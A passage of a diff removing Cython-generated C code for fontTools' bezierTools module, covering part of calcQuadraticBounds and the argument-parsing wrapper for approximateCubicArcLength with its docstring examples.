CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_6 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_8); - #else - __pyx_t_6 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; __pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - index = 1; __pyx_t_8 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ax = __pyx_t_6; - __pyx_t_6 = 0; - __pyx_v_ay = __pyx_t_8; - __pyx_t_8 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_8 = PyList_GET_ITEM(sequence, 0); - __pyx_t_6 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(__pyx_t_6); - #else - __pyx_t_8 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_6 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; __pyx_t_8 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - index = 1; __pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_bx = __pyx_t_8; - __pyx_t_8 = 0; - __pyx_v_by = __pyx_t_6; - __pyx_t_6 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_5))) || (PyList_CheckExact(__pyx_t_5))) { - PyObject* sequence = __pyx_t_5; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_6 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_8); - #else - __pyx_t_6 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - #endif - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_9 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_9); - index = 0; __pyx_t_6 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_6)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_6); - index = 1; __pyx_t_8 = __pyx_t_7(__pyx_t_9); if (unlikely(!__pyx_t_8)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_8); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_9), 2) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_cx = __pyx_t_6; - __pyx_t_6 = 0; - __pyx_v_cy = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":317 - * """ - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) - * ax2 = ax * 2.0 # <<<<<<<<<<<<<< - * ay2 = ay * 2.0 - * roots = [] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ax, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 317, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":318 - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 # <<<<<<<<<<<<<< - * roots = [] - * if ax2 != 0: - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":319 - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 - * roots = [] # <<<<<<<<<<<<<< - * if ax2 != 0: - * roots.append(-bx / ax2) - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 319, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":320 - * ay2 = ay * 2.0 - * roots = [] - * if ax2 != 0: # <<<<<<<<<<<<<< - * roots.append(-bx / ax2) - * if ay2 != 0: - */ - __pyx_t_10 = (__Pyx_PyInt_BoolNeObjC(__pyx_v_ax2, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 320, __pyx_L1_error) - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":321 - * roots = [] - * if ax2 != 0: - * roots.append(-bx / ax2) # <<<<<<<<<<<<<< - * if ay2 != 0: - * roots.append(-by / ay2) - */ - __pyx_t_1 = PyNumber_Negative(__pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_ax2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_11 = __Pyx_PyList_Append(__pyx_v_roots, __pyx_t_5); if (unlikely(__pyx_t_11 == ((int)-1))) __PYX_ERR(0, 321, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":320 - * ay2 = ay * 2.0 - * roots = [] - * if ax2 != 0: # <<<<<<<<<<<<<< - * roots.append(-bx / ax2) - * if ay2 != 0: - */ - } - - /* "fontTools/misc/bezierTools.py":322 - * if ax2 != 0: - * roots.append(-bx / ax2) - * if ay2 != 0: # <<<<<<<<<<<<<< - * roots.append(-by / ay2) - * points = [ - */ - __pyx_t_10 = (__Pyx_PyInt_BoolNeObjC(__pyx_v_ay2, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 322, __pyx_L1_error) - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":323 - * roots.append(-bx / ax2) - * if ay2 != 0: - * roots.append(-by / ay2) # <<<<<<<<<<<<<< - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - */ - __pyx_t_5 = PyNumber_Negative(__pyx_v_by); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_5, __pyx_v_ay2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_11 = __Pyx_PyList_Append(__pyx_v_roots, __pyx_t_1); if (unlikely(__pyx_t_11 == ((int)-1))) __PYX_ERR(0, 323, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":322 - * if ax2 != 0: - * roots.append(-bx / ax2) - * if ay2 != 0: # <<<<<<<<<<<<<< - * roots.append(-by / ay2) - * points = [ - */ - } - - /* "fontTools/misc/bezierTools.py":328 - * for t in roots - * if 0 <= t < 1 - * ] + [pt1, pt3] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - { /* enter inner scope */ - - /* "fontTools/misc/bezierTools.py":324 - * if ay2 != 0: - * roots.append(-by / ay2) - * points = [ # <<<<<<<<<<<<<< - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 324, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":326 - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots # <<<<<<<<<<<<<< - * if 0 <= t < 1 - * ] + [pt1, pt3] - */ - __pyx_t_5 = __pyx_v_roots; __Pyx_INCREF(__pyx_t_5); - __pyx_t_12 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 326, __pyx_L15_error) - #endif - if (__pyx_t_12 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_5, __pyx_t_12); __Pyx_INCREF(__pyx_t_3); __pyx_t_12++; if (unlikely((0 < 0))) __PYX_ERR(0, 326, __pyx_L15_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_12); __pyx_t_12++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 326, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - __Pyx_XDECREF_SET(__pyx_7genexpr__pyx_v_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":327 - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - * if 0 <= t < 1 # <<<<<<<<<<<<<< - * ] + [pt1, pt3] - * return calcBounds(points) - */ - __pyx_t_3 = PyObject_RichCompare(__pyx_int_0, __pyx_7genexpr__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L15_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_3)) { - __Pyx_DECREF(__pyx_t_3); - __pyx_t_3 = PyObject_RichCompare(__pyx_7genexpr__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L15_error) - } - __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 327, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":325 - * roots.append(-by / ay2) - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) # <<<<<<<<<<<<<< - * for t in roots - * if 0 <= t < 1 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_ax, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_bx, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = PyNumber_Add(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_8, __pyx_v_cx); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_v_ay, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_8, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_v_by, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_6 = PyNumber_Add(__pyx_t_2, __pyx_t_8); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_6, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error); - __Pyx_GIVEREF(__pyx_t_8); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error); - __pyx_t_3 = 0; - __pyx_t_8 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_6))) __PYX_ERR(0, 324, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":327 - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - * if 0 <= t < 1 # <<<<<<<<<<<<<< - * ] + [pt1, pt3] - * return calcBounds(points) - */ - } - - /* "fontTools/misc/bezierTools.py":326 - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots # <<<<<<<<<<<<<< - * if 0 <= t < 1 - * ] + [pt1, pt3] - */ - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); __pyx_7genexpr__pyx_v_t = 0; - goto __pyx_L20_exit_scope; - __pyx_L15_error:; - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); __pyx_7genexpr__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L20_exit_scope:; - } /* exit inner scope */ - - /* "fontTools/misc/bezierTools.py":328 - * for t in roots - * if 0 <= t < 1 - * ] + [pt1, pt3] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - __pyx_t_5 = PyList_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 328, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 0, __pyx_v_pt1)) __PYX_ERR(0, 328, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 1, __pyx_v_pt3)) __PYX_ERR(0, 328, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_1, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 328, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_v_points = ((PyObject*)__pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":329 - * if 0 <= t < 1 - * ] + [pt1, pt3] - * return calcBounds(points) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_points}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_ax2); - __Pyx_XDECREF(__pyx_v_ay2); - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_points); - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_18approximateCubicArcLength, "approximateCubicArcLength(pt1, pt2, pt3, pt4)\nApproximates the arc length for a cubic Bezier segment.\n\n Uses Gauss-Lobatto quadrature with n=5 points to approximate arc length.\n See :func:`calcCubicArcLength` for a slower but more accurate result.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> approximateCubicArcLength((0, 0), (25, 100), (75, 100), (100, 0))\n 190.04332968932817\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 50), (100, 100))\n 154.8852074945903\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (150, 0)) # line; exact result should be 150.\n 149.99999999999991\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (-50, 0)) # cusp; exact result should be 150.\n 136.9267662156362\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, -50), (-50, 0)) # cusp\n 154.80848416537057\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_19approximateCubicArcLength = {"approximateCubicArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_18approximateCubicArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateCubicArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 1); __PYX_ERR(0, 332, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 2); __PYX_ERR(0, 332, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, 